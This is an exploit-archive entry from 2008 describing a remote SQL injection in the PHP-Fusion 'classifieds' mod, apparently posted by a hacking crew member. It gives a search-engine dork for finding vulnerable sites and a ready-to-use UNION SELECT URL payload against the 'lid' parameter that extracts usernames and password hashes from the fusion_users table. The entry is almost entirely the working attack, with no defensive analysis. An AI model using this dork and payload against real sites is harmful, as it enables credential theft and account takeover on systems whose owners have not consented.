PHP-Fusion Mod classifieds (lid) Remote SQL Injection Vulnerability

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : PHP-Fusion Mod classifieds (lid) Remote SQL Injection Vulnerability
# Published : 2008-06-27
# Author : boom3rang
# Previous Title : SePortal 2.4 (poll.php poll_id) Remote SQL Injection Vulnerability
# Next Title : Keller Web Admin CMS 0.94 Pro Local File Inclusion Vulnerability

#################################
Php fusion "classifieds"  SQL-injetion  
#################################

++++++++++++++++++++++++++++
Author     :     boom3rang
contact     :    boomerang [at] knaqu-shqipe [dot] de
webpage  :  www.khg-crew.ws 
++++++++++++++++++++++++++++



----> Remote SQL Injection <------


[+] Dork:                     inurl:"classifieds.php?op=detail_adverts"


[+] Example:  www.SITE.com/infusions/classifieds/classifieds.php?op=detail_adverts&lid= [SQL]



exploit:
www.SITE.com/infusions/classifieds/classifieds.php?op=detail_adverts&lid=-9999+union+all+select+1,user_name,user_password,4,5,6,null,null+from+fusion_users--



##########################################
  greetz to:   All my albanian brothers
     =United State of Albania = 
##########################################

# www.Syue.com [2008-06-27]